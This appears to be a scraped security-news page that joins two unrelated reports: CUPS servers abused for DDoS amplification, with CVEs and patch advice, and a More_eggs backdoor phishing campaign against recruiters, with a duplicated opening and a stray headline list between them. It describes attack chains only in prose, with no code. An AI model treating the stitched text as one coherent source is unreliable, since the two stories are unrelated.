Researchers at Akamai SIRT (Security Incident Response Team) also discovered a flaw that allows attackers to exploit vulnerable CUPS servers and turn them into unwitting amplifiers for distributed- denial-of-service (DDoS) attacks, allowing attackers to exploit vulnerable servers and turn them into unwitting DDoS hosts.

According to the company’s **blog post** published on October 01, 2024, the attack involves misinterpreting a UDP packet, downloading malicious data, and establishing multiple TCP connections to a target system, potentially causing an outage. 

****The Scope of the Problem:****

*   Akamai identified over 198,000 internet-connected devices running CUPS.
*   Roughly 34% (over 58,000) of these devices were vulnerable to the attack.
*   Outdated CUPS versions (released as far back as 2007) were the most susceptible.
*   Testing revealed potential amplification factors of up to 600x, significantly increasing attack power.

The issues discussed in these reports are directly related to the Linux vulnerability discovered by Margaritelli because his identified vulnerability involves a remote code execution exploit chain that targets the Common Unix Printing System (CUPS).

This exploit chain leverages several vulnerabilities, including **CVE-2024-47175** (libppd), **CVE-2024-47176** (cups-browsed), **CVE-2024-47177** (cups-filters), and **CVE-2024-47076** (libcupsfilters).

To stay protected, install the latest version of CUPS and ensure all system components, such as libcupsfilters, libppd, and cups-filters, are updated. Disable or configure cups-browsed daemon, if printing isn’t essential, or restrict access to it to trusted devices. Strengthen network security with firewalls, intrusion detection systems, and IPS, and regularly review and update security policies.

1.  **Telegram-Controlled TgRat Trojan Targets Linux Servers**
2.  **Critical Flaws Found in GNU C Library, Major Linux Distros at Risk**
3.  **Goldoon Botnet Hits D-Link Devices by Exploiting 9-Year-Old Flaw**
4.  **7-Year-Old 0-Day in Microsoft Office Exploited to Drop Cobalt Strike**
5.  **9-year-old Windows flaw dropped ZLoader malware in 111 countries**

Decade-Old Linux Vulnerability Can Be Exploited for DDoS Attacks on CUPS

A spear-phishing email campaign has been observed targeting recruiters with a JavaScript backdoor called More_eggs, indicating persistent efforts to single out the sector under the guise of fake job applicant lures.
"A sophisticated spear-phishing lure tricked a recruitment officer into downloading and executing a malicious file disguised as a resume, leading to a more_eggs backdoor infection,"

A spear-phishing email campaign has been observed targeting recruiters with a JavaScript backdoor called More\_eggs, indicating persistent efforts to single out the sector under the guise of fake job applicant lures.

"A sophisticated spear-phishing lure tricked a recruitment officer into downloading and executing a malicious file disguised as a resume, leading to a more\_eggs backdoor infection," Trend Micro researchers Ryan Soliven, Maria Emreen Viray, and Fe Cureg said in an analysis.

More\_eggs, sold as a malware-as-a-service (MaaS), is a malicious software that comes with capabilities to siphon credentials, including those related to online bank accounts, email accounts, and IT administrator accounts.

It's attributed to a threat actor called the Golden Chickens group (aka Venom Spider), and has been put to use by several other e-crime groups like FIN6 (aka ITG08), Cobalt, and Evilnum.

Earlier this June, eSentire disclosed details of a similar attack that leverages LinkedIn as a distribution vector for phony resumes hosted on an attacker-controlled site. The files, in reality, are Windows shortcut (LNK) files that, upon opening, trigger the infection sequence.

The latest findings from Trend Micro mark a slight deviation from the earlier observed pattern in that the threat actors sent a spear-phishing email in a likely attempt to build trust and gain their confidence. The attack was observed in late August 2024, targeting a talent search lead working in the engineering sector.

"Shortly after, a recruitment officer downloaded a supposed resume, John Cboins.zip, from a URL using Google Chrome," the researchers said. "It was not determined where this user obtained the URL. However, it was clear from both users' activities that they were looking for an inside sales engineer."

The URL in question, johncboins\[.\]com, contains a "Download CV" button to entice the victim into downloading a ZIP archive file containing the LNK file. It's worth noting that the attack chain reported by eSentire also includes an identical site with a similar button that directly downloads the LNK file.

Double-clicking the LNK file results in the execution of obfuscated commands that lead to the execution of a malicious DLL, which, in turn, is responsible for dropping the More\_eggs backdoor via a launcher.

More\_eggs commences its activities by first checking if it's running with admin or user privileges, followed by running a series of commands to perform reconnaissance of the compromised host. It subsequently beacons to a command-and-control (C2) server to receive and execute secondary malware payloads.

Trend Micro said it observed another variation of the campaign that includes PowerShell and Visual Basic Script (VBS) components as part of the infection process.

"Attributing these attacks is challenging due to the nature of MaaS, which allows for the outsourcing of various attack components and infrastructure," it said. "This makes it difficult to pin down specific threat actors, as multiple groups can use the same toolkits and infrastructure provided by services like those offered by Golden Chickens."

That said, it's suspected that the attack could have been the work of FIN6, the company noted, citing the tactics, techniques, and procedures (TTPs) employed.

The development comes weeks after HarfangLab shed light on PackXOR, a private packer used by the FIN7 cybercrime group to encrypt and obfuscate the AvNeutralizer tool.

The French cybersecurity firm said it observed the same packer being used to "protect unrelated payloads" such as the XMRig cryptocurrency miner and the r77 rootkit, raising the possibility that it could also be leveraged by other threat actors.

"PackXOR developers might indeed be connected to the FIN7 cluster, but the packer appears to be used for activities that are not related to FIN7," HarfangLab said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows